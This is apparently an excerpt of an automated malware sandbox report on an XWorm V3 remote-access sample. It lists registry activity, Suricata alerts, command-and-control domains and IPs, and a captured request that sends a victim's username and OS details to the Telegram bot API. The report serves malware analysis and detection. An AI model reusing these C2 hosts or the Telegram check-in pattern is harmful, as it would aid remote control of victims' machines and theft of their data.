                          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                          Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A09BF5C FindFirstFileExW,6_2_000002E86A09BF5C
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC64BF5C FindFirstFileExW,11_2_00000225DC64BF5C
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AEBF5C FindFirstFileExW,12_2_00000202C0AEBF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A66130BF5C FindFirstFileExW,14_2_000002A66130BF5C
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF21BF5C FindFirstFileExW,16_2_000002BAAF21BF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879CBF5C FindFirstFileExW,17_2_0000026A879CBF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537ABF5C FindFirstFileExW,19_2_00000179537ABF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D56BF5C FindFirstFileExW,20_2_000002295D56BF5C

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 147.185.221.21:28600
                          Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49739 -> 149.154.167.220:443
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\System32\svchost.exeDomain query: updates-full.gl.at.ply.gg
                          Source: C:\Windows\System32\svchost.exeDomain query: subscribe-bond.gl.at.ply.gg
                          Source: C:\Windows\System32\svchost.exeDomain query: api.telegram.org
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: subscribe-bond.gl.at.ply.gg
                          Uses the Telegram API (likely for C&C communication)
                          Source: unknownDNS query: name: api.telegram.org
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                          Source: global trafficTCP traffic: 192.168.2.4:49731 -> 147.185.221.21:28600
                          Source: global trafficTCP traffic: 192.168.2.4:49740 -> 147.185.221.20:60075
                          Source: global trafficTCP traffic: 192.168.2.4:52581 -> 1.1.1.1:53
                          Source: global trafficHTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                          Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: ip-api.com
                          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: ip-api.com
                          Source: global trafficDNS traffic detected: DNS query: subscribe-bond.gl.at.ply.gg
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficDNS traffic detected: DNS query: updates-full.gl.at.ply.gg
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 13 Oct 2024 17:15:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                          Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000243F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774915423.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                          Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
